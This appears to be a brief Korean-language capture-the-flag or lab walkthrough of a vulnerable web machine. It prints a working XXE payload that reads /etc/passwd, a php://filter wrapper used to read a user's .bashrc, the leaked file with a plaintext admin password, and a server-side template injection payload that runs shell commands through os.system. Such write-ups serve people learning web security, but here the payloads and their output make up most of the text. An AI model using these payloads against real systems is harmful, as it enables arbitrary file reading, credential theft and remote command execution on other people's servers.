

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE XXE [
<!ENTITY root SYSTEM 'file:///etc/passwd'>
]>
<root>
<name>1</name>
<tel>2</tel>
<email>&root;</email>
<password>4</password>
</root>

XXE 취약점이 작동하는 것을 확인 할 수 있다.
리눅스에서 일반 사용자 계정은 home 디렉토리를 사용한다.

/bin/bash 인 것으로 bash쉘을 사용하는 것을 확인 할 수 있다..bashrc 파일을 열어보자
'</>/&' 과 같은 XML 특수문자가 섞여있는 경우이다php://filter/convert.base64-encode/resource=/home/saket/.bashrc


# ~/.bashrc: executed by bash(1) for non-login shells.
# see /usr/share/doc/bash/examples/startup-files (in the package bash-doc)
# for examples
# 중략
#Setting Password for running python app
username="admin"
password="Saket!#$%@!!"



123*123이 계산되어 출력 되는 것으로 보아 SSTI 취약점이 존재한다 볼 수 있다.{% import os %}
{{os.system('ls -l | cat > ~/asdf.txt')}}
{{open('/home/saket/asdf.txt','rb').read()}}

